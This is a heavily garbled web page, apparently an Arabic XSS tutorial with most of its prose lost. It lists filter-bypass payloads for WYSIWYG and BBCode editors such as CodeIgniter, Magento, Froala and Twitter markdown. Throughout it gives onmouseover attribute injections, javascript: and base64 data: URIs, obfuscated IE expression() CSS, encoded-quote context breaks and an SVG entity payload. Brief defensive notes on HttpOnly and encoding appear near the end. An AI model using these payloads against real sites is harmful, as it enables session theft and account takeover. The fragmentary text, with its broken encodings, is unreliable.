( XSS )

XSS Vulnerable In web appliaction

XSS XSS XSS cross-site scripting vulnerabilities MALWARE

XSS XSS

:

1. wysiwyg

2. Magento Commerce Bug

3. WYSIWYG

4. WYSIWYG

5. ( Attack Vector #1 )

6. ( Attack Vector #2 )

7. Attribute Context

8. URL Context

9. Twitter Translation's

10. Style Context

11. WYSIWYG

12. XSS

13.

14. Data URL

15.

WYSIWYG

What You See Is What You Get

: WYSIWYG

1)

2)

3)

4)

5)

6)

7) .....

XSS WYSIWYG Enterprise TinyMCE Editlive Lithium Jive TinyMCE PHP HTML Editor markUp FreeTextBox Froala Editor Eirte CKEditor ...

WYSIWYG Magento Commer XSS 1000 $ http://magento.com/security

2051362 334227 448284 http://www.magentocommerce.com/boards/

Bold [b] html 4 [color=blue] [size=4]

[b][size=4][color=blue]bold[/size][/color][/b]

HTML

bold

bold Preview

document.cookie Removed

[removed] XSS

code Igniters CI_Security PHP XSS document.cookie Removed

code Igniters

GitHub PHP . CodeIgniter 264038

[b][size=4][color=blue]bold[/size][/color][/b]

[b/onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

And/or

[b onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

" [b/onmouseover=alert(1)]"

bold

" [b onmouseover=alert(1)]"

bold

HTML URL URI JAVASCRIPT DATA URI

[url=http://www.bbcnews.com]Top Stories[/url]

[url=javascript:alert(1)]Top Stories[/url]

DATA URI

[url=data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+]Top Stories[/url]

URL

alert(1)]Top Stories

Top Stories

URL http:// https:// absolute URL Relative URL CodeIgniter "Removed" http: DATA URL

JAVA EXPRESSION

[b][size=4][color=blue]bold[/size][/color][/b]

EXPRESSION

[b][size=4][color=width:expression(alert(1))]bold[/size][/color][/b]

alert(1))]bold

""Removed

[b][size=4][color=blue]bold[/size][/color][/b]

[b][size=4][color=width:expre/**/ssion(alert(1))]bold[/size][/color][/b]

bold

CodeIgniter expre ssion Removed codeIgniter's black-listed Style .

Color Style HTML Color

[b][size=4][color=blue]bold[/size][/color][/b]

[b][style=width:expre/**/ssion(alert(1))]bold [/style] [/b]

bold

style class Style Context style

[b][style=style=width:expre/**/ssion(alert(1))]bold[/style][/b]]

bold

class style Class

[b][style="style=width:expre/**/ssion(alert(1))]bold[/style][/b]]

bold

bold

IE7 eventHandler

[b][style="onmouseover="alert(cookie);]bold[/style][/b]

cookie document.cookie CodeIgniter ""removed document.cookie cookie xss

https://support.mozilla.org/en-US/kb/cookies-information-websites-store-on-your-computer

PHPSESSIONID HTTPONLY SECURE vBulletin 2014 ubuntu forums Apple Developers forums

md5 www-data vBulletin

https://www.youtube.com/watch?v=blDzqctIU2E

https://www.youtube.com/watch?v=TYcP3FbK3X4

xss wordpress 3.x

https://www.youtube.com/watch?v=7K15yzSeIGo

Content Management Systems(CMS) Drupal WordPress Magento JetSpeed ....

WYSIWYG :-

:

URL

ID , CLASS

WYSIWYG

( Attack Vector #1 ) :

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg

http://xssplayground.net23.net/xss"onmouseover="alert(1); imagefile.svg

xss img

URL Decoder Explicit Server Side Decoding Decoder " "

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg?"onmouseover="alert(1)

URL

! !

!Image URL Goes Here!

decoder " encode

Store XSS

Store XSS reflacted XSS Store xss kindle direct Publishing (break context)

( Attack Vector #2 ) :

URL IMG A Data:image SVG XML

data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=

svg jpg png Torjan_horse.jpg

http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg

Alt id class ALT

Jive

img :

firefox 33.0

Attribute Context

( )

// Context Name Attribute

// Context Value Attribute

JAVASCRIPT URL

xhtml XHTML alt , class , id , src,

IE8

Github

Online

URL Context

URL

LOCATION Action XSS CSRF SSRF

:

:

URI javascript

URL Javascript

(with encoding (Obfuscation i encoding URL HTML5 enitity Encoding Hex Encoding decimal Encoding

Data URI

Data-Base64 URL URL Base64 URI data is hidden 100

Vbscript

onmouseover=alert(1)

FreeTextBox WYSIWYG Asp.net

FreeTextBox

PHP HTML Hp Liberal.ca PHP JQUERY Joomla , Dojo Joomla Dojo Editor html Asp.net Asp Cute Cute 10000 60 XSS 10000

Web Wiz EditLive https://www.webwiz.co.uk/companyinfo/

customer-testimonials.htm

MarkitUp

http://ephox.com/customers

Twitter Translation's

https://twitter.com/ - automatic!

[Tiwtter](https://twitter.com/)

twitter

[] Tiwtter () URL

[Tiwtter](javascript:alert(1))

twitter

Twitter

Data URI vb script uri encoding html

[twitter](javascript:alert(1))

twitter

Amp enitity html encoding URL encoding

[Tiwtter](javascript:alert%281%29)

twitter

3rd party libraries WYSIWYG MarkDown

http://daringfireball.net/projects/markdow

n/dingus

Style Context

CSS style style html html xml xslt

Online

()

:

URI ie Expression Css

hex encoding encoding decimal html encoding ie

\ xss

CKEditor ebay

tinyMCE Expression Expr/**/ession ie Expression

URL DATA URI

data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+

xss innerHTML

onmouseover=alert(1)

() IE 8 innerHTML :

div layer

click

:

Attacking well-secured web-applications by using innerHTML Mulations: in css 2013

WYSIWYG (Attacking Insert/Edit/Upload File Feature of WYSIWYG)

Drop file name

XSS

IMPERAVI Redactor

http://imperavi.com/redactor/

XSS Froala

Demo(Issue Fixed)

http://jsfiddle.net/7qgt9wrw/3/

HTTPONLY HTTP / HTTPS

PAYPAL

Froala :

javascript:alert(1) data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+

http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)

image title innerHtml

onmouseover=alert(1)

WYSIWYG (Attacking Insert video Feature of Wysiwyg Editors)

Object embed onmouseover

Youtube Froala Raptor

....

object , embed HTML

XSS

xss

framework

... xss

XSS

HttpOnly flag

pluggin

HttpOnly AJAX

HttpOnly document.cookie Dom Property AJAX

AJAX ( GET POST )

AJAX AJAX HttpOnly

https://www.isecur1ty.org/%D8%B4%D8%B1%D8%AD-%D8%AB%D8%BA%D8%B1%D8%A7%D8%AA-blind-xss

XSS DOM

https://www.security4arabs.com/2014/01/12/dombased-xss-vulnerabilities

flag Secure

https sidehijacking session id cookie http https Secure CPU

XSS 1000$

http://demo.chmsoftware.com/7fc785c6bd26b49d7a7698a7518a73ed/

81570 catch all

:

1

str_replace $bad_chars $safe_chars $input $bad_chars $input $safe_chars " ' , encoding html string

encoding encoding :

http://jsfiddle.net/9t8UM/3/

divlayer

Hard coded double quotes in order to break the attribute contex

divlayer

Decimal Encoded Double Quotes

divlayer

Hex Encoded Double Quotes

divlayer

URL Encoded Double Quotes

divlayer

HTML5 Encoded Double Quotes

divlayer

Unicode Encoded Double Quotes

divlayer

Encoding decoding Encoding Explicit Server Side Decoding

2 :

Style

" '

ie

\\ \\

< style

:

Injection here

alert(1)

: ;

3 :

URL Context

http https ftp : // " , ' \

http://jsfiddle.net/hfot8ruq/

pipeline

This is normal text - and this is bold text.

This is normal text - and this is bold text.

Output Reflects Here:

Filter has catch your awesome vector ... Try hard :(

data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=

.

Data URL

http https Content-type binary html xml YAML Content-type mime/type Characher set charset=UTF-8 ascii code non-ascii code

URL Data

data:[][;base64],

mediatype mime/type text/plain;charset=US-ASCII URL encoding Hex encoding svg svg

data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'%3E%3Cpath d='M224%20387.814V512L32 320l192-192v126.912C447.375 260.152 437.794 103.016 380.93 0 521.287 151.707 491.48 394.785 224 387.814z'/%3E%3C/svg%3E

SVG

svg11.dtd

URL Encoding

%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E

base64 Encoding

PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+

DATA URL

data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+

URL Encoding

data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E

svg xml

xml cloud office

XML xml JSON javascript object notation data type encoding

xml

Xml Markup xhtml Markup markup html

XML SpagoBI () .... XML talned , ! XML

XML XHTML XSL SVG :

Common DOCTYPE Declarations

https://www.w3.org/QA/2002/04/valid-dtd-list.html

Base 64 Encoding

1-10 10 20 base 10 1-10 base 16 09 , AF base 64 AZ, az,and 09 +, / ascii code

base 64 binary audio Json string java script object notation

base 64 decoding spamming anit-spamming

Json base 64 encoding Json base 64

( base 64 encoding Image ) png jpg svg data URL Base64 base64_encode()

confirm(1);

// set element onclick event handler

window.onload=function () {

var square = document.getElementById("square");

// onclick event handler, change circle radius

square.onclick = function() {

var color = this.getAttribute("fill");

if (color == "#ff0000") {

this.setAttribute("fill", "#0000ff");

} else {

this.setAttribute("fill","#ff0000");

}

}

}

]]>

svg CDATA enitity xhtml

Accessing Inline SVG

// set element onclick event handler

window.onload=function () {

var square = document.getElementById("square");

// onclick event handler, change circle radius

square.onclick = function() {

var color = this.getAttribute("fill");

if (color == "#ff0000") {

this.setAttribute("fill","#0000ff");

} else {

this.setAttribute("fill","#ff0000");

}

}

}

]]>

SVG

if (document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image", "1.1")) {

document.documentElement.className = "svg";

}

img { width: 18.75em; height: 6.25em; }

img.svg { display: none; }

img.png { display: inline; }

html.svg img.svg { display: inline; }

html.svg img.png { display: none; }

svg

http://voormedia.com/blog/2012/10/displaying-and-detecting-support-for-svg-images

Svg html 5 SVG

http://edutechwiki.unige.ch/en/Using_SVG_with_HTML5_tutorial#Embeding_SVG_in_HTML_5_with_the_object_tag

https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf

https://h4cksc4n.wordpress.com